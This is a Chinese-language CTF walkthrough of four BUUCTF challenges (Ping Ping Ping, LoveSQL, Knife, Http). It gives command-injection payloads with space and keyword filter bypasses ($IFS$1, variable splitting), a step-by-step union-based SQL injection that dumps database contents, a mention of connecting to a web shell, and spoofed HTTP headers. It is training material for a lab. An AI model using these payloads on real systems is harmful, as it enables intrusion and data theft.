目录
[GXYCTF2019]Ping Ping Ping
启动靶机,构造payload
?ip=127.0.0.1
查看同目录下有什么文件
?ip=127.0.0.1;ls
读取flag.php
?ip=127.0.0.1;cat flag.php
不能加空格?那就用逗号代替空格
?ip=127.0.0.1;cat,flag.php
看来flag也不能出现,尝试绕过,用$IFS$1来代替空格(这里用,代替空格不能拿到flag)
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
右键查看源代码
拿到flag flag{0cd6d38d-e87a-4178-970f-d309590a5f8c}
[极客大挑战 2019]LoveSQL
启动靶机,登录框,先用万能密码登一下,没别的页面,但观察url因该可以在username处注入
/check.php?username=1' union select 1,2,3%23&password=123456
发现第二和第三个是显示位
爆库
/check.php?username=1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23&password=123456
爆表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=123456
爆列
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'%23&password=123456
最后查询语句
/check.php?username=1' union select 1,2,group_concat(password) from l0ve1ysq1%23&password=123456
拿到flag flag{8b962563-1a25-4c28-827d-d9b53f47519b}
[极客大挑战 2019]Knife
启动靶机,看提示直接用菜刀连接
拿到flag flag{902ee2a5-1add-476b-9ce4-57dd89b25641}
[极客大挑战 2019]Http
启动靶机,右键查看源代码
访问一下这个php文件
看来是要进行http头部伪造,打开burp抓包
在http头部增加一行
referer:https://Sycsecret.buuoj.cn
修改User-Agent (把Mozilla/5.0改成Syclover)
User-Agent: Syclover (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
构造本地ip
X-Forwarded-For:127.0.0.1
拿到flag flag{d973eb66-4a9d-48e6-ba38-c990427353fe}